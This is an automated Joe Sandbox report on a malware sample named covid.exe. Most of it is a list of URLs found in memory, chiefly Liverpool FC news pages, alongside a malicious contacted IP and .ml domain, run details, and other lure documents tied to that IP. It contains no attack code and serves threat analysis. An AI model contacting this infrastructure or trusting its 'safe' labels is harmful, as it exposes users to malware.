https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690 | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803. | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03- | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.liverpool.com/all-about/premier-league | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03- | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.liverpool.com/liverpool-fc-news/ | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154 | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837. | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850 | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02 | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.nirsoft.net/ | AdvancedRun.exe, AdvancedRun.exe, 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000013.00000002.323823436.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000015.00000002.322563501.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000F.00000002.434270179.00000000049C1000.00000004.00000001.sdmp | false | - | high
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.js | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | false | - | high
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876 | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmp | false | - | high
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166 | covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://reachplc.hub.loginradius.com" | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03- | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818. | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690 | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://s2-prod.liverpool.com | covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816 | covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837 | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmp | false | - | high
https://i2-prod.liverpool.com | covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp | false | URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://felix.data.tm-awx.com/felix.min.jscovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://www.liverpool.com/all-about/ozan-kabakcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://s2-prod.mirror.co.uk/covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://www.liverpool.com/all-about/champions-leaguecovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://www.liverpool.com/all-about/curtis-jonescovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://www.liverpool.com/all-about/steven-gerrardcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://schema.org/NewsArticlecovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                high
                https://www.liverpool.com/schedule/covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://schema.org/BreadcrumbListcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                  high
                  https://securepubads.g.doubleclick.net/tag/js/gpt.jscovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                    high
                    http://ocsp.sectigo.com041c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://s2-prod.liverpool.com/covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://felix.data.tm-awx.com/ampconfig.json&quot;covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://schema.org/ListItemcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      high
                      https://www.liverpool.com/all-about/georginio-wijnaldumcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://mab.data.tm-awx.com/rhs&quot;covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://felix.data.tm-awx.comcovid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://www.liverpool.com/all-about/andrew-robertsoncovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://sectigo.com/CPS0C41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://sectigo.com/CPS0D41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s180/0_GettyImages-1304940818.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://www.liverpool.com/covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://www.liverpool.com/all-about/transferscovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://reach-id.orbit.tm-awx.com/analytics.js.gzcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://github.com/ded/script.jscovid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                        high
                        https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-17164868covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://quantcast.mgr.consensu.orgcovid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
172.67.220.147 | mmwrlridbhmibnr.ml | United States | 13335 | CLOUDFLARENET | false

Private

IP
192.168.2.1

                        General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 393947
Start date: 20.04.2021
Start time: 22:58:20
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 59s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: covid.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 37
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal68.evad.winEXE@15/17@1/2
EGA Information:
• Successful, ratio: 75%
HDC Information:
• Successful, ratio: 100% (good quality ratio 95.8%)
• Quality average: 83%
• Quality standard deviation: 25.9%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 47
• Number of non-executed functions: 171
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Excluded processes from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 104.43.193.48, 204.79.197.200, 13.107.21.200, 20.50.102.62, 104.43.139.144, 23.54.113.53, 205.185.216.10, 205.185.216.42, 168.61.161.212, 23.57.80.111, 20.82.210.154, 92.122.213.247, 92.122.213.194, 52.254.96.93, 20.54.26.129, 52.251.11.100
• Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, bn2eap.displaycatalog.md.mp.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

Time | Type | Description
22:59:57 | API Interceptor | 1x Sleep call for process: covid.exe modified
23:00:13 | API Interceptor | 68x Sleep call for process: powershell.exe modified

                        Joe Sandbox View / Context

                        IPs

Match | Associated Sample Name / URL | Detection | Context
172.67.220.147 | 8TkFgL94vo.exe | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-4230C74ABAEB3870FA9EAF5AC5F71FD3.html
172.67.220.147 | List.doc | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BDE7E4D0EF11A9396211C4DC45CCA257.html
172.67.220.147 | QUOTE.doc | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-9E65D4E4E8AEF8BD307A35D3BCE3AEEE.html
172.67.220.147 | 7789-2020.doc | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-3B326A21F43E9F3D00AC05CA57C8BA56.html
172.67.220.147 | payment receipt.doc | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BAD1D062871DD0CB1CFE768455005D62.html
172.67.220.147 | QUOTE.doc | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-97E0AB11BF622A9A31CDEFFB82113E1B.html
172.67.220.147 | cLQd2QVOWu.exe | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-DBBB4E10CBD7095142CF4698058E72A4.html
172.67.220.147 | item list.doc | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BDE7E4D0EF11A9396211C4DC45CCA257.html
172.67.220.147 | Orders.exe | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-7AFD341D75B1C01FA414B8FBB3F4F2BC.html
